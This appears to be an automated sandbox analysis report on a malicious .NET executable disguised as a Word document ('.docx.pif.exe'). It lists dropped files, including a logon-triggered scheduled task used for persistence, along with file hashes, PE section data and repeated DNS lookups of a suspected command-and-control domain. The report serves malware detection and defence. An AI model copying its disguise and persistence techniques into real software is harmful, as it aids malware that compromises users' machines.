                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                  Process:C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1585
                  Entropy (8bit):5.111138330597854
                  Encrypted:false
                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJVxvn:cgergYrFdOFzOzN33ODOiDdKrsuTNv
                  MD5:CD4C848977FDC9A63F12CBAADCE502CE
                  SHA1:B3F73B7790638E59E1FAA58FE98ABE5C2CF20CFE
                  SHA-256:71309762BD0BA5A91AC3919C010C5846741BA249FC3ADE2A0463DDEB8DCA9972
                  SHA-512:E8AB87D419864C76DD8A15ED6997200DE661BEBF64ADBE195B0427D8A54E26A0A39E3647990997A605CF301D1191949EDF6CB5EF7A803A25BF4B7170612DDF79
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                  Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):947200
                  Entropy (8bit):7.983193004234871
                  Encrypted:false
                  SSDEEP:24576:FH4jFT3ukLRXXj/B01PAdydgysfGFmODltkGj/kZEER:NgBRXNWwydgysXiVDgEE
                  MD5:A048AFA687356F7D1B0FC9375CA13D06
                  SHA1:EC3F1158191496C89CE09CCB1DC699278B2A506A
                  SHA-256:F0EC07E537C7BF74ABBC66AF82E1F273FCECA81467E1D74ED69514107421DE61
                  SHA-512:B8D4905142400E2401AD14C7DB11E09CF22877A3F44B8BA7040B3003EE751B45006BAA565EFFD206F228DB8B0280E913970EF3D8B567A44EE4E597EE04FAA639
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 66%
                  • Antivirus: Virustotal, Detection: 60%, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f..............0..d..........J.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...Pb... ...d.................. ..`.rsrc................h..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.983193004234871
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  File name:#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  File size:947'200 bytes
                  MD5:a048afa687356f7d1b0fc9375ca13d06
                  SHA1:ec3f1158191496c89ce09ccb1dc699278b2a506a
                  SHA256:f0ec07e537c7bf74abbc66af82e1f273fceca81467e1d74ed69514107421de61
                  SHA512:b8d4905142400e2401ad14c7db11e09cf22877a3f44b8ba7040b3003ee751b45006baa565effd206f228db8b0280e913970ef3d8b567a44ee4e597ee04faa639
                  SSDEEP:24576:FH4jFT3ukLRXXj/B01PAdydgysfGFmODltkGj/kZEER:NgBRXNWwydgysXiVDgEE
                  TLSH:F51533CDA95062B3E9DF9B3B6C4A2157A32102831E51FB6B44DD286D0BF7F919A1C3C1
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f..............0..d..........J.... ........@.. ....................................@................................
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x4e824a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x668377DE [Tue Jul 2 03:45:34 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe81f80x4f.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x5b8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000xe62500xe6400e024985ca9446a05f6b67121ea73ffd6False0.9830601927252985data7.988838794549899IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0xea0000x5b80x8001df0921b916320feb512d9c2f6fcbc8fFalse0.3173828125data3.3339806865010586IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xec0000xc0x400756ee87c57079290f77fa30f44ec6299False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_VERSION0xea0900x328data0.41707920792079206
                  RT_MANIFEST0xea3c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 3, 2024 08:56:24.270512104 CEST6019253192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:24.280669928 CEST53601921.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:28.331130981 CEST6161053192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:28.343866110 CEST53616101.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:33.409312963 CEST6540253192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:33.466813087 CEST53654021.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:38.535712957 CEST5059553192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:38.827802896 CEST53505951.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:43.893645048 CEST5862553192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:43.903305054 CEST53586251.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:48.971956015 CEST6504053192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:49.069515944 CEST53650401.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:54.143879890 CEST5426053192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:54.153686047 CEST53542601.1.1.1192.168.2.5
                  Jul 3, 2024 08:56:59.112674952 CEST6001553192.168.2.51.1.1.1
                  Jul 3, 2024 08:56:59.122919083 CEST53600151.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:03.393755913 CEST5640753192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:03.403296947 CEST53564071.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:08.909529924 CEST5403153192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:08.918978930 CEST53540311.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:13.581195116 CEST5364553192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:13.593436003 CEST53536451.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:18.549947977 CEST5992153192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:18.560497999 CEST53599211.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:23.331290960 CEST6071953192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:23.342292070 CEST53607191.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:28.319273949 CEST6267853192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:28.327120066 CEST53626781.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:33.315313101 CEST5085453192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:33.323407888 CEST53508541.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:38.315375090 CEST5107053192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:38.325294971 CEST53510701.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:43.315311909 CEST5999253192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:43.365637064 CEST53599921.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:48.315514088 CEST5468153192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:48.494849920 CEST53546811.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:53.316277981 CEST5501253192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:53.325556993 CEST53550121.1.1.1192.168.2.5
                  Jul 3, 2024 08:57:58.319196939 CEST6483153192.168.2.51.1.1.1
                  Jul 3, 2024 08:57:58.326651096 CEST53648311.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:03.315529108 CEST5778953192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:03.330084085 CEST53577891.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:08.315574884 CEST5962653192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:08.325579882 CEST53596261.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:13.315798998 CEST5303653192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:13.324846029 CEST53530361.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:18.315737009 CEST5996653192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:18.324537039 CEST53599661.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:23.316168070 CEST5607953192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:23.327635050 CEST53560791.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:28.315675974 CEST6269753192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:28.325026989 CEST53626971.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:33.317519903 CEST5096853192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:33.325328112 CEST53509681.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:38.315308094 CEST6195153192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:38.325536013 CEST53619511.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:43.315426111 CEST5555853192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:43.329607964 CEST53555581.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:48.315768957 CEST5503053192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:48.325776100 CEST53550301.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:53.316962004 CEST6189153192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:53.327050924 CEST53618911.1.1.1192.168.2.5
                  Jul 3, 2024 08:58:58.315200090 CEST6058953192.168.2.51.1.1.1
                  Jul 3, 2024 08:58:58.322714090 CEST53605891.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:03.315196037 CEST5974953192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:03.324140072 CEST53597491.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:08.315299988 CEST6405353192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:08.324922085 CEST53640531.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:13.315197945 CEST5935853192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:13.327971935 CEST53593581.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:18.316107035 CEST6217453192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:18.328504086 CEST53621741.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:23.319614887 CEST5122053192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:23.328694105 CEST53512201.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:28.315279007 CEST5047953192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:28.322148085 CEST53504791.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:33.315345049 CEST6398853192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:33.323002100 CEST53639881.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:38.315784931 CEST5882253192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:38.328473091 CEST53588221.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:43.315524101 CEST5797553192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:43.427354097 CEST53579751.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:48.315165043 CEST6473353192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:48.355978966 CEST53647331.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:53.315262079 CEST5943753192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:53.324678898 CEST53594371.1.1.1192.168.2.5
                  Jul 3, 2024 08:59:58.315330982 CEST6410953192.168.2.51.1.1.1
                  Jul 3, 2024 08:59:58.322719097 CEST53641091.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:03.315283060 CEST5781653192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:03.323411942 CEST53578161.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:08.315629005 CEST6038753192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:08.324614048 CEST53603871.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:13.315690994 CEST5589753192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:13.323545933 CEST53558971.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:18.317969084 CEST5306553192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:18.327438116 CEST53530651.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:23.315448999 CEST6080353192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:23.346307039 CEST6080353192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:23.582281113 CEST53608031.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:23.583151102 CEST53608031.1.1.1192.168.2.5
                  Jul 3, 2024 09:00:28.318608999 CEST5202753192.168.2.51.1.1.1
                  Jul 3, 2024 09:00:28.325944901 CEST53520271.1.1.1192.168.2.5
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 3, 2024 08:56:24.270512104 CEST192.168.2.51.1.1.10x9c75Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:28.331130981 CEST192.168.2.51.1.1.10xcffdStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:33.409312963 CEST192.168.2.51.1.1.10xe10aStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:38.535712957 CEST192.168.2.51.1.1.10xd8afStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:43.893645048 CEST192.168.2.51.1.1.10xc65fStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:48.971956015 CEST192.168.2.51.1.1.10x273dStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:54.143879890 CEST192.168.2.51.1.1.10x7af8Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:59.112674952 CEST192.168.2.51.1.1.10x488cStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:03.393755913 CEST192.168.2.51.1.1.10x1590Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:08.909529924 CEST192.168.2.51.1.1.10xc2bcStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:13.581195116 CEST192.168.2.51.1.1.10xcfa9Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:18.549947977 CEST192.168.2.51.1.1.10xd8acStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:23.331290960 CEST192.168.2.51.1.1.10xaef6Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:28.319273949 CEST192.168.2.51.1.1.10x2b8aStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:33.315313101 CEST192.168.2.51.1.1.10xc2acStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:38.315375090 CEST192.168.2.51.1.1.10x3056Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:43.315311909 CEST192.168.2.51.1.1.10xb1e6Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:48.315514088 CEST192.168.2.51.1.1.10xd971Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:53.316277981 CEST192.168.2.51.1.1.10x5141Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:58.319196939 CEST192.168.2.51.1.1.10xaea1Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:03.315529108 CEST192.168.2.51.1.1.10x8a29Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:08.315574884 CEST192.168.2.51.1.1.10xde4cStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:13.315798998 CEST192.168.2.51.1.1.10x7a2aStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:18.315737009 CEST192.168.2.51.1.1.10x103dStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:23.316168070 CEST192.168.2.51.1.1.10x1aa5Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:28.315675974 CEST192.168.2.51.1.1.10x3027Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:33.317519903 CEST192.168.2.51.1.1.10x8e0bStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:38.315308094 CEST192.168.2.51.1.1.10xca69Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:43.315426111 CEST192.168.2.51.1.1.10x4ce2Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:48.315768957 CEST192.168.2.51.1.1.10x1082Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:53.316962004 CEST192.168.2.51.1.1.10x4d67Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:58.315200090 CEST192.168.2.51.1.1.10x3eafStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:03.315196037 CEST192.168.2.51.1.1.10x3be7Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:08.315299988 CEST192.168.2.51.1.1.10x25daStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:13.315197945 CEST192.168.2.51.1.1.10x4e18Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:18.316107035 CEST192.168.2.51.1.1.10x95beStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:23.319614887 CEST192.168.2.51.1.1.10x7fe6Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:28.315279007 CEST192.168.2.51.1.1.10x12ddStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:33.315345049 CEST192.168.2.51.1.1.10x4a46Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:38.315784931 CEST192.168.2.51.1.1.10xd9a7Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:43.315524101 CEST192.168.2.51.1.1.10x1ad4Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:48.315165043 CEST192.168.2.51.1.1.10x25fdStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:53.315262079 CEST192.168.2.51.1.1.10x66c5Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:58.315330982 CEST192.168.2.51.1.1.10x612bStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:03.315283060 CEST192.168.2.51.1.1.10x468bStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:08.315629005 CEST192.168.2.51.1.1.10x219aStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:13.315690994 CEST192.168.2.51.1.1.10xab96Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:18.317969084 CEST192.168.2.51.1.1.10xdb20Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:23.315448999 CEST192.168.2.51.1.1.10xe2f4Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:23.346307039 CEST192.168.2.51.1.1.10xe2f4Standard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:28.318608999 CEST192.168.2.51.1.1.10xeb7eStandard query (0)www.vipguyclassproject2024.spaceA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 3, 2024 08:56:24.280669928 CEST1.1.1.1192.168.2.50x9c75Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:28.343866110 CEST1.1.1.1192.168.2.50xcffdName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:33.466813087 CEST1.1.1.1192.168.2.50xe10aName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:38.827802896 CEST1.1.1.1192.168.2.50xd8afName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:43.903305054 CEST1.1.1.1192.168.2.50xc65fName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
